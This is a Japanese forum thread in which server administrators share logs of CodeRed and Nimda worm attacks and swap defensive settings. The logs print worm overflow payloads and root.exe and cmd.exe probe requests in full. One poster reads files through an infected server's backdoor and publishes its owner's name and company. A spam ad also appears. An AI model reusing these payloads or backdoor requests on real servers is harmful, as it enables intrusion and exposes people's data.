この鯖ワームにやられてます
自宅で鯖も善いけど、管理はちゃんとしようよ。 ログを汚すだけではなく、ネットワーク資源のムダ使いの CodeRedやNimdaその他のワームにやられてる鯖を教え合おう!! 管理者がこの板みて、対処を期待する。 >>159 踏み台にして失敗したものです。 気になるようだったら、 SetEnvIf HOST FQDN allowed01 deny from env=!allowed01 にしとけば、403返すかと。 >>150 >貴方感染 チョン環境っていうより大陸向けのような気もします。 半島って標準で和文や簡体、繁体フォント入ってるのかなあ。 マジレスすると普通に Your environment is infected with the virus and it is troubled. Please carry out somehow. とかのほうが(文字コードだなんだ考えずに済んで)いいと思います。 >>160 あ、そうだったんですか。 うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。 教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。 「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ ラーが返る。」とありましたので、httpd.confに設定してみました。 しばらくこれで様子を見てみます。ありがとうございました。 今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。 ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ ックするぐらいしか出来ませんが、地道にやっていきます。 64.110.110.240 /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (略) XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ858ヨbd3ヨ801ヨ090ヨ090ヨ190ヨ0c3ヨ003ヨb00ヨ31bヨ3ffヨ078ヨ000ヨ0=a ウガンダキタ━━━━━━(゚∀゚)━━━━━━━!!!!! 202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-" 最近多いのですが、このリクエストは何でしょうか?新手のワーム? 219.218.95.81 - - [15/May/2003:17:46:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-" ワーム対策にバーチャルホストはどうよ HTTP_HOSTがない場合はダミーページの飛ばす ログをバーチャルホスト毎に記録すれば ワームのログは通常のログに混じらないが ━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━― 203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373 ∧_∧ ピュ.ー ( ^^ ) <これからも僕を応援して下さいね(^^)。 =〔~∪ ̄ ̄〕 = ◎――◎ 山崎渉 初心者からの素朴な疑問 例えば、 c:/www/scripts/..チ/winnt/system32/cmd.exe にワームがアクセスしてくるとしますよね。 該当するディレクトリを作って、cmd.exeって名前のファイル(例えばフロッピーにアクセスし続けるファイルとか)置いといたらどうなるんでしょ? きのうの夕方に同一IPから5秒おきに20連発 "GET /NULL.IDA?CCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000 %u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000 %ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90 x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\ xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\ x90\x90\x90\x8b\xf7f\xb8H\x063 ... <以下略、とても長い> >>173 それうちにも来た。 そのあとなんか意味不明な文字があってしかもログが改行されちゃう。 何なのそれ? 久々にIRC繋いだら、こんなん帰ってきたのだが… irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272 ワームチェックかなんかでしょうか? http://yahoobb219055208068.bbtec.net/ バッチリ幹線してるようです。 [2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/ 1 HTTP/1.1 200 OK 2 Server: Microsoft-IIS/5.0 3 Date: Fri, 13 Jun 2003 18:18:56 GMT 4 Connection: keep-alive 5 Connection: Keep-Alive 6 Content-Length: 1230 7 Content-Type: text/html 8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/ 9 Cache-control: private 200 OK どうやって警告したらいいでしょうか。 ftpとか開いてるし、アノニログインできるし(;´Д`) 厨房運営の鯖でしょうか。 Port State Service 7/tcp open echo 9/tcp open discard 13/tcp open daytime 17/tcp open qotd 19/tcp open chargen 21/tcp open ftp 25/tcp open smtp 80/tcp open http 135/tcp open loc-srv 137/tcp filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp filtered netbios-ssn 443/tcp open https 445/tcp filtered microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 6699/tcp open napster いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな? htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" アプリケーション例外が発生しました: アプリケーション: (pid=1020) 発生時間: 2003/05/01 @ 21:50:51.907 例外番号: c0000005 (アクセス違反) *----> システム情報 <----* コンピュータ名: VFGYARXITW27V4Y ユーザー名: Administrator プロセッサの数: 1 プロセッサの種類: x86 Family 6 Model 8 Stepping 6 Windows 2000 Version: 5.0 現在のビルド: 2195 Service Pack: None 現在のタイプ: Uniprocessor Free 登録されている会社名: 日本フレートライナー(株) 登録されている所有者: 山ア勝行 これはもう警鐘モンだぞ。 パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。 212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX(rya http://212.165.132.144/scripts/root.exe?/c+type+ "..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log" Application exception occurred: App: (pid=1568) When: 6/2/2003 @ 02:07:38.527 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: CISCO-ACS User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 8 Stepping 10 Windows 2000 Version: 5.0 Current Build: 2195 Service Pack: None Current Type: Uniprocessor Free Registered Organization: prestel Registered Owner: okada okadaって日本人か? (´-`).。oO(不正にアクセスして個人情報開示してるバカだよなぁ・・・) 日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような ややグレーゾーンに近いがな。 インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。 わたしのホームページへアクセスした人は、不正アクセスでタイーホしてもらいます(w Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、 %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a は Code Green の物らしい。 ウイルスだった事には変わりは無いわけだが。 かぎの開いている家に侵入して情報ファイルを持ち出したら そいつは窃盗罪だろう。 不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を 公開したりしてなにか損害が起きればけっこう痛いことになるかもね 超過激ライブチャット登場!!!!! あなたの命令で若い娘たちがヌレヌレモードへ ☆★アメリカ西海岸発☆★モザイクなし☆★ あなたの言葉で・・・ヌードにさせてください あなたの指で・・・感じさせてください あなたの声で・・・イ・カ・セ・テ・ください 寂しがりやの留学生の若い娘がお待ちしております! ただいま、10分間無料で体験できるほか7日間会費無料!! http://www.gals-cafe.com 6月分のcodered。 01/Jun/2003 30 02/Jun/2003 37 03/Jun/2003 24 04/Jun/2003 31 05/Jun/2003 30 06/Jun/2003 24 07/Jun/2003 24 08/Jun/2003 27 09/Jun/2003 31 10/Jun/2003 38 11/Jun/2003 30 12/Jun/2003 37 13/Jun/2003 40 14/Jun/2003 20 15/Jun/2003 25 16/Jun/2003 33 17/Jun/2003 27 18/Jun/2003 22 19/Jun/2003 21 20/Jun/2003 28 21/Jun/2003 24 22/Jun/2003 22 23/Jun/2003 27 24/Jun/2003 34 25/Jun/2003 26 26/Jun/2003 32 27/Jun/2003 33 28/Jun/2003 32 29/Jun/2003 24 30/Jun/2003 16 これワーム関係?初めて見たんだけど それともアタック? 2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-" 2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-" 2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-" 2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-" 2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-" 2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-" 2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-" 2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-" 2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-" 2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-" 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" 全67行 アクセスしようとしてるファイル名から推測すると IIS狙いのワームでないかい? うちにはまだお見えになられてないです >>194 > 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-" cgiwrapの設定不備狙ってる? IIS狙いとは言い切れない予感。 例の改ざん祭りの下準備かも((((((;゚Д゚))))))ガクガクブルブル __∧_∧_ |( ^^ )| <寝るぽ(^^) |\⌒⌒⌒\ \ |⌒⌒⌒~| 山崎渉 ~ ̄ ̄ ̄ ̄ 孫さん家の人が衛生管理していないので、「出禁」にしています。 衛生管理出来る様になったら、タイム系サーバーを追加して 監視兵を置くかな・・・ そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。 最近、損さん家のf@t息子が猛烈アタックしてきます。 UDPの3010・3012・3013と投げてくるけど、これ何でしょ? ∧_∧ ∧_∧ ピュ.ー ( ・3・) ( ^^ ) <これからも僕たちを応援して下さいね(^^)。 =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕 = ◎――――――◎ 山崎渉&ぼるじょあ >>205 なんで書き換えられちゃうわけ?あなたの会社のサイト ろくにパッチも当ててないDQN鯖官なのけ >>207 ごめん、動揺して説明たらずだった。 会社きて、自宅のHP見てみようとしたら、書き換えられてた。 自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。 はぁ… >>208 なんか穴があるんだろうね いい機会だから徹底的にしらべましょう SSLとBINDがあやしいっすね。 最近会社忙しく自宅鯖放置気味だったからバチが当たったなー… なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい… atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190 %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida ?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c 3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-" この2ホスト、ここ1ヶ月ほど止まらない。 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ そろそろISPのabuseにでも連絡すっかな。 >>212 > 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・ ・・・。 ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、 クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか? もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。 >>214 根本的にだめ。 ウイルス、ワーム、セキュリティについてのポリシーを 自分で確立すべし 俺の自宅サーバーにおけるセキュリティについての考え方のひとつに 「稼動時間を減らす」てのあるけど誰も賛同してくれん。 「馬鹿じゃねぇ?」「使えねぇ!」の連呼 うるせー馬鹿! >>216 いや、科学技術庁も導入したぐらいだし(藁 稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので 結局常時稼働とさほど変わらないんでないの? セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。 うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国 それから、Nimdaも30〜40連続アタック [error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。 うちも先月までは>>219 とほぼ同量のアタックがあったんだが、 1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら 解除した後もなぜかアタックが以前より減少してる どれくらい来てるのかな?とオモテ2002年10月以降のログを一括検索したら4609件出てきた。 ヽ(`Д´)ノウワァァァン Nimdaの時に比べたらかなり平和だよな。 あのときはピーク時で1分間に2〜3回アクセスが続いたし。 帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。 (⌒V⌒) │ ^ ^ │<これからも僕を応援して下さいね(^^)。 ⊂| |つ (_)(_) 山崎パン パケット通信危うし・・・ 納入先監視装置、今月は1万円を越えました×n台 この先どうなることやら・・・ yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-" デザインが変... もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。 当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。 全部 bbtec.net 遮断に決定。俺は困らねぇし。 UDP LOOPアタックくらいまくりなんですがどうしたらいいですか? 特定の相手難ですが。 2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" パッチ当ててない鯖って周りにも迷惑かけて最悪だな ahooBBキター 2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか? これずっとやられて、アクセス数がどんどん増えて行ってしまいます。 同時接続数が限られる環境でこの攻撃は痛いです。 だれか辞めさせる手段をご教授お願いします。 2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 - 2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 - 2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 - 2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 - 2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 - 2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 - 2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 - 2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 - 2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 - 2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 - 2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 - 2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 - 2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 - 2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 - 2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 - 2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 - 2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 - 2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) 2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 - うちのSnortSnarfの警告ページね。 2つの異なるイグネチャーが219.96.206.60として存在しています。発信源 ・65個の事例はWEB-IIS ISAPI .ida attempt ・65個の事例はWEB-IIS cmd.exe access ここ学校なんだよね〜 あまりにウザイからwhoisでわざわざ調べて メールで教えてあげようと思ったら。 failure noticeときたもんだ! 管理ちゃんとしようよー >>234 219.96.206.60 = haruna.kibou.ed.jp 適当にpostmaster@とかwebmaster@に送ってみたらどうよ いまだにcoderedとかに感染している奴氏んでしまえばいいのに WINNTAutoAttackっていうんですかこれ? 221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8% u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90 \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 (以下略) 中国人かな? taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404 http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html Hacktool.WKRShell セキュリティホール memo http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/ Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049) http://www.st.ryukoku.ac.jp/ ~kjm/security/memo/#20031112_MS03-049 EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12) http://www.st.ryukoku.ac.jp/ ~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html MS03-049が危険な理由 (ZDNet) http://www.zdnet.co.jp/enterprise/0311/14/epn02.html 最近こんなのばっか 213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" 誰か対処法教えて…ログがわけわかんなくなる ウチは、ルータで Directed Broadcast 破棄しといた 65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -% アメリカより。 >>245 うちのルータもpingを排除したら迷惑な香具師も少なくなりますた 一日1500くらいアタックがくるよ。 一分に一回程度。 やんなっちゃう。 真っ当なアクセスなら1500って夢のような数字だけどさ ルータ新しいのにかえようかなあ pingを排除できるルータがあるんならかえたい。 けど、金ない。 よわったのお >>247 iptables -A INPUT -p icmp -i ppp+ -j DROP スレ違いレス なんかこのスレ見て自分の鯖が心配になってきた。 確認する方法と防ぐ方法きぼんぬ。 OSがWindowsならWindowsUpだて汁! 他のOSはシラネ >>249 鯖の電源切れば心配しなくてもよくなるYO 同じIPから毎日のように来るので 調べてみたらどうやらクライアント機らしい。 同じ時間帯に集中するのは、その時間帯に電源入れてるから。 updateやウイルスチェックぐらいしろと… 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: ⌒ ⌒| |_,|_,|_,|/⌒ -="- (-=" |_,|_,|_人そ(^i '"" ) ・ ・)""ヽ | ) ヽノ |. ┃`ー-ニ-イ`┃ そうでっか、そうでっか、なるほどね | `".`´ ノ ┃ ⌒ ┃| 人 入_ノ´ ┃ ┃ノ\ / \_/\\ ┗━━┛/ \\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | | / | ヽ__|_| 巛彡彡ミミミミミ彡彡 巛巛巛巛巛巛巛彡彡 r、r.r 、|::::: | r |_,|_,|_,||:::::: /' '\ | |_,|_,|_,|/⌒ (・ ) (・ )| |_,|_,|_人そ(^i ⌒ ) ・・)'⌒ヽ | ) ヽノ |. ┏━━━┓| | `".`´ ノ ┃ ノ ̄i ┃| 人 入_ノ´ ┃ヽニニノ┃ノ\ ・・・・で?seireiやnekoninがサービス悪いとでもいいたいの? / \_/\\ ┗━━┛/|\\ / \ ト ───イ/ ヽヽ / ` ─┬─ イ i i / | Y | >>247 1500アタック/日?普通だよ、普通。 >>249 FW・フィルタ付きのルータを導入し、SYSLOGを見れ。 最近、時々来る "GET /sumthin"が不気味だな。 200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-" >>257 それはサムスンの綴りを間違えたのです。 ってのは冗談で、 ググるとすこしはわかるかもしれませんよ。 ワームじゃないんだけど 韓国からのアクセスが多い、 ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね 鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、 一時間に3回ぐらいの割合で入ってる 毎回違う串さして同一人物がやってるんだろうか… 他にログが無くてこればっかり並んでるから激しく怖い read.cgi ver 07.5.5 2024/06/08 Walang Kapalit ★ | Donguri System Team 5ちゃんねる